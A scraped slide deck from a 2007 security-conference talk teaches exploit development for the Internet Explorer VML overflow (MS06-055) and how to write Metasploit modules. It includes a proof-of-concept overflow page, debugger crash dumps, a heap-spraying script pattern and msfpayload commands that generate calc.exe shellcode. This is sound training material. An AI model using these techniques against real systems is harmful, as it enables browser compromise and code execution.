O slideshow foi denunciado.
Utilizamos seu perfil e dados de atividades no LinkedIn para personalizar e exibir anúncios mais relevantes. Altere suas preferências de anúncios quando desejar.

Writing Metasploit Plugins

Writing Metasploit Plugins

Audiolivros relacionados

Gratuito durante 30 dias do Scribd

Ver tudo
  • Seja o primeiro a comentar

Writing Metasploit Plugins

  1. 1. More on Metasploit plugins from vulnerability to exploit Saumil Shah ceo, net-square IT Underground - Prague 2007
  2. 2. <ul><li>Saumil Shah - “krafty” </li></ul><ul><ul><li>ceo, net-square solutions </li></ul></ul><ul><ul><li>[email_address] </li></ul></ul><ul><ul><li>author: “Web Hacking - Attacks and Defense” </li></ul></ul># who am i # who am i 16:08 up 4:26, 1 user, load averages: 0.28 0.40 0.33 USER TTY FROM LOGIN@ IDLE WHAT saumil console - 11:43 0:05 bash
  3. 3. From Vulnerability to Exploit Fuzzing EIP = 0x41414141 Debugger Attack Vector Reliable EIP return address Bad characters Test Shellcode (INT 3) INT 3? Final Shellcode Working exploit Shellcode Handling
  4. 4. The CPU’s registers <ul><li>The Intel 32-bit x86 registers: </li></ul>ESP EAX EBP EBX ESI ECX EDI EDX EIP accumulator base counter data instruction pointer destination index source index base pointer stack pointer
  5. 5. The Process Memory Map environment vars cmd line arguments **envp **argv argc main() local vars … v heap ^ stack … heap - malloc’ed data .bss .data .text 0xc0000000 0x08000000
  6. 6. Win32 Process Memory Map No access Shared user page PEB First TEB DLLs DLLs DLLs heap program image error trapping 0x7FFFFFFF 0x00000000 0x00010000 stack 0x7FFE1000 0x7FFE0000 0x7FFDF000 0x7FFDE000 0x40000000
  7. 7. Exploit example - IE VML overflow <ul><li>Buffer overflow in IE’s VML implementation </li></ul><ul><li>MS06-055 </li></ul><ul><li><v:fillmethod=“AAAAAAAA…”> </li></ul><ul><li>Exploiting IE 6 on XP SP2 </li></ul><ul><li>Triggering the exploit by overwriting SEH </li></ul>
  8. 8. Windows SEH <ul><li>SEH - Structured Exception Handler </li></ul><ul><li>Windows pops up a dialog box: </li></ul><ul><li>Default handler kicking in. </li></ul>
  9. 9. Exception handling <ul><li>Try / catch block </li></ul><ul><li>Pointer to the exception handling code also saved on the stack, for each code block. </li></ul>try { : code that may throw : an exception. } catch { : attempt to recover from : the exception gracefully. }
  10. 10. Exception handling … implementation params saved EIP saved EBP Bottom of stack more frames frame w/ exception handling local vars addr of exception handler exception handler code (catch block)
  11. 11. SEH Record <ul><li>Each SEH record is of 8 bytes </li></ul><ul><li>These SEH records are found on the stack. </li></ul><ul><li>In sequence with the functions being called, interspersed among function (block) frames. </li></ul><ul><li>WinDBG command - !exchain </li></ul>address of exception handler ptr to next SEH record
  12. 12. SEH Chain <ul><li>Each SEH record is of 8 bytes </li></ul>addr of ex_handler1 ptr to SEH_record_2 addr of ex_handler2 ptr to next SEH_record_n default exception handler 0xFFFFFFFF MSVCRT!exhandler ex_handler1() ex_handler2() bottom of stack
  13. 13. SEH on the stack address of exception handler 0xFFFFFFFF main() ^ stack func_z() initial entry frame MSVCRT!exhandler address of exception handler ptr to next SEH record ex_handler_z() params saved EBP saved EIP local vars
  14. 14. Yet another way of getting EIP <ul><li>Overwrite one of the addresses of the registered exception handlers… </li></ul><ul><li>… and, make the process throw an exception! </li></ul><ul><li>If no custom exception handlers are registered, overwrite the default SEH. </li></ul><ul><li>Might have to travel way down the stack… </li></ul><ul><li>… but in doing so, you get a long buffer! </li></ul>
  15. 15. Overwriting SEH address of exception handler ptr to next SEH record ex_handler() params saved EBP saved EIP buffer
  16. 16. Overwriting SEH AAAA AAAA AAAA : : : AAAA AAAA ex_handler() AAAA AAAA AAAA AAAA AAAA Illegal memory access causes segmentation fault. OS invokes registered exception handler in the chain EIP = 0x42424242 AAAA
  17. 17. ie_vml1 <ul><li>proof of concept: </li></ul><head> <object id=&quot;VMLRender” classid=&quot;CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E&quot;> </object> <style>v:* { behavior: url(#VMLRender); }</style> </head> <body> <v:rect style='width:120pt;height:80pt' fillcolor=&quot;red&quot;> <script> document.write(&quot;<v:fill method =&quot;&quot;); for(i = 0; i < 2625; i++) document.write(&quot;&#x4141&#x4141&#x4141&#x4141&quot;); document.write(&quot;&quot;>&quot;); </script> </v:rect></v:fill></body>
  18. 18. Setting up the exploit <ul><li>On your host </li></ul><ul><ul><li>Run daemon.pl to serve up ie_vml1.html </li></ul></ul><ul><li>On the Windows box </li></ul><ul><ul><li>start up iexplore </li></ul></ul><ul><ul><li>start up WinDBG </li></ul></ul><ul><ul><li>press F6 in WinDBG and attach to iexplore.exe </li></ul></ul>$ ./daemon.pl ie_vml1.html [*] Starting HTTP server on 8080 0:005> gh
  19. 19. Crashing IE <ul><li>Surf to http://192.168.7.xxx:8080/ </li></ul><ul><li>The SEH record is overwritten. </li></ul>(18c.584): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0013b4c4 ebx=001df20c ecx=0013b4b8 edx=00004141 esi=0000259e edi=00140000 eip=5deded1e esp=0013b4a0 ebp=0013b6c8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Program FilesCommon FilesMicrosoft SharedVGXvgx.dll - vgx!$DllMain$_gdiplus+0x30e8d: 5deded1e 668917 mov [edi],dx ds:0023:00140000=6341 0:000> !exchain 0013e420: 41414141 Invalid exception stack at 41414141
  20. 20. Crashing IE <ul><li>Surf to http://192.168.7.xxx:8080/ </li></ul>0:000> !exchain 0013e420: 41414141 Invalid exception stack at 41414141 0:000> g (18c.584): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=41414141 edx=7c9037d8 esi=00000000 edi=00000000 eip=41414141 esp=0013b0d0 ebp=0013b0f0 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 41414141 ?? ???
  21. 21. EIP = 0x41414141 <ul><li>We control EIP. </li></ul><ul><ul><li>Where do you want to go…? </li></ul></ul><ul><li>Direct return to stack? </li></ul><ul><ul><li>XP SP2 doesn’t allow it. </li></ul></ul><ul><li>Jump through registers? </li></ul><ul><ul><li>EDX ESP and EBP are the only possible options…but they don’t point to our buffer. </li></ul></ul><ul><ul><li>Other registers are cleared, thanks to XP SP2. </li></ul></ul><ul><ul><li>XP SP2 also forbids jumping into DLLs. </li></ul></ul>
  22. 22. How do we pull it off? <ul><li>In other circumstances, we’d have to go through long tedious routes… </li></ul><ul><li>… or publish a DoS exploit and call it a day. </li></ul><ul><ul><li>L4m3 </li></ul></ul><ul><li>We are exploiting a browser </li></ul><ul><li>Browsers run Javascript </li></ul><ul><li>Javascript has arrays </li></ul><ul><li>Javascript arrays occupy heap memory </li></ul>
  23. 23. Loading our buffer in the heap <ul><li>Can we load our shellcode in the heap via Javascript? </li></ul><ul><li>How do we know where our buffer lies? </li></ul><ul><li>Direct jump into heap? </li></ul><ul><ul><li>yes! that is possible. </li></ul></ul>
  24. 24. Heap Spraying <ul><li>Technique pioneered by Skylined </li></ul><ul><li>Make a VERY large NOP sled </li></ul><ul><li>Append shellcode at its end </li></ul><ul><li>Create multiple instances of this NOP sled in the heap memory </li></ul><ul><ul><li>using Javascript arrays… a[0] = str; a[1] = str… </li></ul></ul><ul><li>The heap gets “sprayed” with our payloads. </li></ul><ul><li>Land somewhere in the NOPs, and you win. </li></ul>
  25. 25. Heap Spraying NOP sled shellcode NOP sled shellcode NOP sled shellcode <script> : spray = build_large_nopsled(); a = new Array(); for(i = 0; i < 100; i++) a[i] = spray + shellcode; : </script> <html> : exploit trigger condition goes here : </html> a[7] a[8] a[9]
  26. 26. Tips on Heap Spraying <ul><li>Make really large NOP sleds </li></ul><ul><ul><li>approx 800,000 bytes per spray block </li></ul></ul><ul><li>Adjust the size of the NOP sled to leave very little holes inbetween spray blocks. </li></ul><ul><li>Javascript Unicode encoding works great for shellcode. </li></ul><ul><ul><li>shellcode = unescape(“%uXXXX%uXXXX…”); </li></ul></ul><ul><ul><li>Null bytes are not a problem anymore. </li></ul></ul>
  27. 27. ie_vml2 <ul><li>On your host </li></ul><ul><ul><li>Run daemon.pl to serve up ie_vml2.html </li></ul></ul><ul><li>On the Windows box </li></ul><ul><ul><li>start up iexplore </li></ul></ul><ul><ul><li>start up WinDBG </li></ul></ul><ul><ul><li>press F6 in WinDBG and attach to iexplore.exe </li></ul></ul>$ ./daemon.pl ie_vml2.html [*] Starting HTTP server on 8080 0:005> gh
  28. 28. Crashing IE again <ul><li>INT3 shellcode. </li></ul><ul><li>Look for “90 90 90 90 cc cc cc cc” in the memory after IE crashes. </li></ul>0:000> s 02000000 l fffffff 90 90 90 90 cc cc cc cc 02150020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02360020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02570020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02780020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02990020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02ba0020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02db0020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02fc0020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 031d0020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 033e0020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ : : :
  29. 29. Jump to heap <ul><li>We can point EIP to any of the sprayed blocks. </li></ul><ul><li>Arbitrarily choose addresses </li></ul><ul><ul><li>0x03030303 </li></ul></ul><ul><ul><li>0x04040404 </li></ul></ul><ul><ul><li>0x05050505…etc. </li></ul></ul><ul><li>ie_vml3.html jumps to 0x05050505 </li></ul><ul><li>Got INT 3? </li></ul>
  30. 30. Introducing Metasploit <ul><li>An advanced open-source exploit research and development framework. </li></ul><ul><li>http://metasploit.com </li></ul><ul><li>Current stable version: 2.7 </li></ul><ul><ul><li>Written in Perl, runs on Unix and Win32 (cygwin) </li></ul></ul><ul><li>Brand new 3.0 </li></ul><ul><ul><li>Complete rewrite in Ruby </li></ul></ul>
  31. 31. Introducing Metasploit <ul><li>Generate shellcode. </li></ul><ul><li>Shellcode encoding. </li></ul><ul><li>Shellcode handlers. </li></ul><ul><li>Scanning binaries for specific instructions: </li></ul><ul><ul><li>e.g. POP/POP/RET, JMP ESI, etc. </li></ul></ul><ul><li>Ability to add custom exploits, shellcode, encoders. </li></ul><ul><li>… and lots more. </li></ul>
  32. 32. Enter Shellcode <ul><li>Code assembled in the CPU’s native instruction set. </li></ul><ul><li>Injected as a part of the buffer that is overflowed. </li></ul><ul><li>Most typical function of the injected code is to “spawn a shell” - ergo “shellcode”. </li></ul><ul><li>A buffer containing shellcode is termed as “payload”. </li></ul>
  33. 33. Writing Shellcode <ul><li>Need to know the CPU’s native instruction set: </li></ul><ul><ul><li>e.g. x86 (ia32), x86-64 (ia64), ppc, sparc, etc. </li></ul></ul><ul><li>Tight assembly language. </li></ul><ul><li>OS specific system calls. </li></ul><ul><li>Shellcode libraries and generators. </li></ul><ul><li>Metasploit Framework. </li></ul>
  34. 34. Injecting the shellcode <ul><li>Easiest way is to pack it in the buffer overflow data itself. </li></ul><ul><li>Place it somewhere in the payload data. </li></ul><ul><li>Need to figure out where it will reside in the memory of the target process. </li></ul>
  35. 35. A little about shellcode <ul><li>Types of shellcode: </li></ul><ul><ul><li>Bind shell </li></ul></ul><ul><ul><li>Exec command </li></ul></ul><ul><ul><li>Reverse shell </li></ul></ul><ul><ul><li>Staged shell, etc. </li></ul></ul><ul><li>Advanced techniques: </li></ul><ul><ul><li>Meterpreter </li></ul></ul><ul><ul><li>Uploading and running DLLs “in-process” </li></ul></ul><ul><ul><li>… etc. </li></ul></ul>
  36. 36. Payload Encoders <ul><li>Payload encoders create encoded shellcode, which meets certain criteria. </li></ul><ul><li>e.g. Alpha2 generates resultant shellcode which is only alphanumeric. </li></ul><ul><li>Allows us to bypass any protocol parsing mechanisms / byte filters. </li></ul><ul><li>An extra “decoder” is added to the beginning of the shellcode. </li></ul><ul><ul><li>size may increase. </li></ul></ul>
  37. 37. Payload Encoders <ul><li>Example: Alpha2 encoding </li></ul><ul><li>Transforms raw payload into alphanumeric only shellcode. </li></ul><ul><li>Decoder decodes the payload “in-memory”. </li></ul>decoder UnWQ89Jas281EEIIkla2wnhaAS901las original shellcode (ascii 0-255)
  38. 38. Payload Encoders <ul><li>Metasploit offers many types of encoders. </li></ul><ul><li>Work around protocol parsing </li></ul><ul><ul><li>e.g. avoid CR, LF, NULL </li></ul></ul><ul><ul><li>toupper(), tolower(), etc. </li></ul></ul><ul><li>Defeat IDS </li></ul><ul><ul><li>Polymorphic Shellcode </li></ul></ul><ul><ul><li>Shikata Ga Nai </li></ul></ul>
  39. 39. Using Metasploit to generate shellcode <ul><li>We need Javascript Unicode encoded shellcode. </li></ul><ul><li>We will run “calc.exe” </li></ul><ul><li>msfpayload - cmdline shellcode generation. </li></ul><ul><li>msfencode - cmdline shellcode encoder. </li></ul><ul><li>jsencode.pl - wrapper around Metasploit’s Pex::Utils::JSUnescape() function. </li></ul>
  40. 40. <ul><li>Generate JSencoded shellcode: </li></ul><ul><li>Final version ie_vml4.html contains working shellcode. </li></ul><ul><li>A slight problem </li></ul><ul><ul><li>too many CALCs! </li></ul></ul>Generate calc.exe shellcode $ ./msfpayload win32_exec EXITFUNC=“seh” CMD=“calc.exe” R | ./jsencode.pl
  41. 41. Exit function - “thread” vs. “seh” <ul><li>Exiting via SEH causes the whole thing to repeat itself. </li></ul><ul><li>Re-generate the shellcode using EXITFUNC=“thread” </li></ul>$ ./msfpayload win32_exec EXITFUNC=“thread” CMD=“calc.exe” R | ./jsencode.pl
  42. 42. Writing Metasploit exploit modules <ul><li>Integration within the Metasploit framework. </li></ul><ul><li>Multiple target support. </li></ul><ul><li>Dynamic payload selection. </li></ul><ul><li>Dynamic payload encoding. </li></ul><ul><li>Built-in payload handlers. </li></ul><ul><li>Can use advanced payloads. </li></ul><ul><li>… a highly portable, flexible and rugged exploit! </li></ul>
  43. 43. How Metasploit runs an exploit List of known target values user supplied exploit info Metasploit Shellcode Library Encoders Payload handlers create payload launch attack get connection EXPLOIT preamble
  44. 44. Writing a Metasploit exploit <ul><li>Perl module (2.6), Ruby module (3.0) </li></ul><ul><li>Pre-existing data structures </li></ul><ul><ul><li>%info, %advanced </li></ul></ul><ul><li>Constructor </li></ul><ul><ul><li>sub new {…} </li></ul></ul><ul><li>Exploit code </li></ul><ul><ul><li>sub Exploit {…} </li></ul></ul>
  45. 45. Structure of the exploit perl module package Msf::Exploit::name; use base “Msf::Exploit”; use strict; use Pex::Text; my $advanced = { }; my $info = { }; sub new { } sub Exploit { } information block constructor return an instance of our exploit exploit block
  46. 46. %info <ul><li>Name </li></ul><ul><li>Version </li></ul><ul><li>Authors </li></ul><ul><li>Arch </li></ul><ul><li>OS </li></ul><ul><li>Priv </li></ul><ul><li>UserOpts </li></ul><ul><li>Payload </li></ul><ul><li>Encoder </li></ul><ul><li>Refs </li></ul><ul><li>DefaultTarget </li></ul><ul><li>Targets </li></ul><ul><li>Keys </li></ul>
  47. 47. Metasploit Pex <ul><li>Perl EXtensions. </li></ul><ul><ul><li><metasploit_home>/lib/Pex.pm </li></ul></ul><ul><ul><li><metasploit_home>/lib/Pex/ </li></ul></ul><ul><li>Text processing routines. </li></ul><ul><li>Socket management routines. </li></ul><ul><li>Protocol specific routines. </li></ul><ul><li>These and more are available for us to use in our exploit code. </li></ul>
  48. 48. Pex::Text <ul><li>Encoding and Decoding (e.g. Base64) </li></ul><ul><li>Pattern Generation </li></ul><ul><li>Random text generation (to defeat IDS) </li></ul><ul><li>Padding </li></ul><ul><li>… etc </li></ul>
  49. 49. Pex::Socket <ul><li>TCP </li></ul><ul><li>UDP </li></ul><ul><li>SSL TCP </li></ul><ul><li>Raw UDP </li></ul>
  50. 50. Pex - protocol specific utilities <ul><li>SMB </li></ul><ul><li>DCE RPC </li></ul><ul><li>SunRPC </li></ul><ul><li>MSSQL </li></ul><ul><li>… etc </li></ul>
  51. 51. Pex - miscellaneous utilities <ul><li>Pex::Utils </li></ul><ul><li>Array and hash manipulation </li></ul><ul><li>Bit rotates </li></ul><ul><li>Read and write files </li></ul><ul><li>Format String generator </li></ul><ul><li>Create Win32 PE files </li></ul><ul><li>Create Javascript arrays </li></ul><ul><li>… a whole lot of miscellany! </li></ul>
  52. 52. metasploit_skel.pm <ul><li>A skeleton exploit module. </li></ul><ul><li>Walk-through. </li></ul><ul><li>Can use this skeleton to code up exploit modules. </li></ul><ul><li>Place finished exploit modules in: </li></ul><ul><ul><li><path_to_metasploit>/exploits/ </li></ul></ul>
  53. 53. Finished examples <ul><li>my_ie_vml.pm </li></ul>
  54. 54. Some command line Metasploit tools <ul><li>msfcli </li></ul><ul><ul><li>Metasploit command line interface. </li></ul></ul><ul><ul><li>Can script up metasploit framework actions in a non-interactive manner. </li></ul></ul><ul><li>msfpayload </li></ul><ul><ul><li>Generate payload with specific options. </li></ul></ul><ul><li>msfencode </li></ul><ul><ul><li>Encode generated payload. </li></ul></ul>
  55. 55. More command line Metasploit tools <ul><li>msfweb </li></ul><ul><ul><li>Web interface to the Metasploit framework. </li></ul></ul><ul><li>msfupdate </li></ul><ul><ul><li>Live update for the Metasploit framework. </li></ul></ul>
  56. 56. New in Version 3.0 <ul><li>msfd </li></ul><ul><ul><li>Metasploit daemon, allows for client-server operation of Metasploit. </li></ul></ul><ul><li>msfopcode </li></ul><ul><ul><li>command line interface to Metasploit’s online opcode database. </li></ul></ul><ul><li>msfwx </li></ul><ul><ul><li>a GUI interface using wxruby. </li></ul></ul>
  57. 57. New in Version 3.0 <ul><li>New payloads, new encoders. </li></ul><ul><li>Ruby extension - Rex (similar to Pex) </li></ul><ul><li>NASM shell. </li></ul><ul><li>Back end Database support. </li></ul><ul><li>… whole lot of goodies here and there. </li></ul>
  58. 58. Thank You! Saumil Shah [email_address] http://net-square.com +91 98254 31192

    Seja o primeiro a comentar

    Entre para ver os comentários

  • kingraptor90

    Feb. 26, 2012
  • antiviruser

    Mar. 7, 2012
  • emmsr88

    Oct. 19, 2012
  • richdaugherty

    Jan. 3, 2013
  • cfernandomaciel

    Feb. 19, 2013
  • fozavci

    Mar. 5, 2013
  • wenbois2000

    Apr. 1, 2013
  • rusticme

    Oct. 28, 2013
  • mbj2007

    Nov. 1, 2013
  • ksanket

    Dec. 25, 2013
  • gtin00b

    Jan. 21, 2014
  • 0xXXX

    Jul. 9, 2014
  • ssuseracf13a

    Nov. 26, 2014
  • mrpa

    Apr. 24, 2015
  • gbengaozone1

    Jul. 23, 2015
  • jd001001

    Aug. 13, 2015
  • SuhasEdavalli

    Aug. 17, 2015
  • mujahedaltahle

    Aug. 26, 2015
  • OmariRodney

    Mar. 17, 2018
  • hteixe

    Jun. 19, 2019

Writing Metasploit Plugins


Vistos totais


No Slideshare


De incorporações


Número de incorporações